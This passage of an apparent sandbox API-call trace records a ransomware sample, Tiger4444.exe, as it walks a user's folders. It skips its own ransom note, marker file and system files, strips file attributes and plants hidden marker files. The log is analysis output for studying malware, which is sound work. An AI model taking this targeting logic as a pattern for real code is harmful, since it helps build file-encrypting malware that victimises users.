cAlternateFileName="")) returned 0xc72f88 [0053.027] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.027] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.027] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0053.027] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.027] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e2133a4, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x84811156, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.028] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.028] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.028] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0053.028] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.028] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.028] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84811156, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84811156, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x849dadde, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.028] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.028] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.028] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc8e8141c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0053.028] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0053.028] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0053.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x22) returned 1 [0053.028] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x6) returned 1 [0053.028] lstrlenW (lpString="desktop.ini") returned 11 [0053.028] lstrlenW (lpString="Tiger4444") returned 9 [0053.028] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0053.028] lstrlenW (lpString=".dll") returned 4 [0053.028] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0053.029] lstrlenW (lpString=".lnk") returned 4 [0053.029] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0053.029] lstrlenW (lpString=".ini") returned 4 [0053.029] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0053.029] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c6308a, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c6308a, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xc4114d32, ftLastWriteTime.dwHighDateTime=0x1d327e6, nFileSizeHigh=0x0, nFileSizeLow=0x932, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Tiger4444.exe") returned -1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootmgr") returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="pagefile.sys") returned -1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot") returned 1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ids.txt") returned -1 [0053.029] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="NTUSER.DAT") returned -1 [0053.029] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0053.029] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk", dwFileAttributes=0x0) returned 1 [0053.029] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0053.029] lstrlenW (lpString="Tiger4444") returned 9 [0053.029] lstrcmpiW (lpString1="hrome.lnk", lpString2="Tiger4444") returned -1 [0053.029] lstrlenW (lpString=".dll") returned 4 [0053.029] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.030] lstrlenW (lpString=".lnk") returned 4 [0053.030] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.030] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9c00c4b, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa9c00c4b, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xa9c995d7, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x517, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Outlook.lnk", cAlternateFileName="MICROS~1.LNK")) returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="Tiger4444.exe") returned -1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2=".") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="..") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="windows") returned -1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="bootmgr") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="pagefile.sys") returned -1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="boot") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="ids.txt") returned 1 [0053.030] lstrcmpiW (lpString1="Microsoft Outlook.lnk", lpString2="NTUSER.DAT") returned -1 [0053.030] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="Microsoft Outlook.lnk" | out: lpString1="Microsoft Outlook.lnk") returned="Microsoft Outlook.lnk" [0053.030] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Microsoft Outlook.lnk", dwFileAttributes=0x0) returned 1 [0053.030] lstrlenW (lpString="Microsoft Outlook.lnk") returned 21 [0053.030] lstrlenW (lpString="Tiger4444") returned 9 [0053.030] lstrcmpiW (lpString1="tlook.lnk", lpString2="Tiger4444") returned 1 [0053.030] lstrlenW (lpString=".dll") returned 4 [0053.030] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.030] lstrlenW (lpString=".lnk") returned 4 [0053.030] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.030] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d67afb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Tiger4444.exe") returned -1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="windows") returned -1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootmgr") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="pagefile.sys") returned 1 [0053.030] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot") returned 1 [0053.031] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ids.txt") returned 1 [0053.031] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="NTUSER.DAT") returned 1 [0053.031] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="Shows Desktop.lnk" | out: lpString1="Shows Desktop.lnk") returned="Shows Desktop.lnk" [0053.031] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x0) returned 1 [0053.031] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0053.031] lstrlenW (lpString="Tiger4444") returned 9 [0053.031] lstrcmpiW (lpString1="sktop.lnk", lpString2="Tiger4444") returned -1 [0053.031] lstrlenW (lpString=".dll") returned 4 [0053.031] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.031] lstrlenW (lpString=".lnk") returned 4 [0053.032] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.032] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xac3ebde6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="Tiger4444.exe") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2=".") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="..") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="windows") returned -1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="bootmgr") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="pagefile.sys") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="boot") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="ids.txt") returned 1 [0053.032] lstrcmpiW (lpString1="User Pinned", lpString2="NTUSER.DAT") returned 1 [0053.032] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="User Pinned" | out: lpString1="User Pinned") returned="User Pinned" [0053.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0053.032] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xaa) returned 0xc7a2e8 [0053.032] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66308 [0053.032] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Tiger4444.exe") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="windows") returned -1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootmgr") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="pagefile.sys") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ids.txt") returned 1 [0053.032] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="NTUSER.DAT") returned 1 [0053.032] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="Window Switcher.lnk" | out: lpString1="Window Switcher.lnk") returned="Window Switcher.lnk" [0053.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x0) returned 1 [0053.032] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0053.032] lstrlenW (lpString="Tiger4444") returned 9 [0053.032] lstrcmpiW (lpString1="tcher.lnk", lpString2="Tiger4444") returned -1 [0053.033] lstrlenW (lpString=".dll") returned 4 [0053.033] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0053.033] lstrlenW (lpString=".lnk") returned 4 [0053.033] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0053.033] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2111f8cb, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2111f8cb, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 0 [0053.033] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0053.033] lstrcpyW (in: lpString1=0x30aeb3a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.033] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a8 [0053.033] CreateFileMappingW (hFile=0x2a8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0053.033] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0053.034] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0053.034] CloseHandle (hObject=0x260) returned 1 [0053.034] CloseHandle (hObject=0x2a8) returned 1 [0053.034] GetCurrentThreadId () returned 0xfa8 [0053.034] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66628 [0053.034] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0053.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a2e8 | out: hHeap=0xc50000) returned 1 [0053.034] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66620 | out: hHeap=0xc50000) returned 1 [0053.034] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0053.034] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0053.034] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3" [0053.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0053.086] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0053.089] FlushFileBuffers (hFile=0x2c4) returned 1 [0053.319] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.366] CloseHandle (hObject=0x2c4) returned 1 [0053.367] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 84 [0053.367] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.367] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x84a01184, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0053.367] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.367] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.367] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0053.367] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.367] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3bf8be86, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xac3ebde6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x84a01184, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.367] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.367] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.367] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0053.367] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.367] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.368] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x84a01184, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x84a01184, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x84a9dbe1, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.368] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.368] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.368] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x441842cf, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd3853abd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x441842cf, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Tiger4444.exe") returned -1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="windows") returned -1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="bootmgr") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="pagefile.sys") returned -1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="boot") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="ids.txt") returned 1 [0053.368] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="NTUSER.DAT") returned -1 [0053.368] lstrcpyW (in: lpString1=0x30aeb52, lpString2="ImplicitAppShortcuts" | out: lpString1="ImplicitAppShortcuts") returned="ImplicitAppShortcuts" [0053.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0053.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0053.368] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User 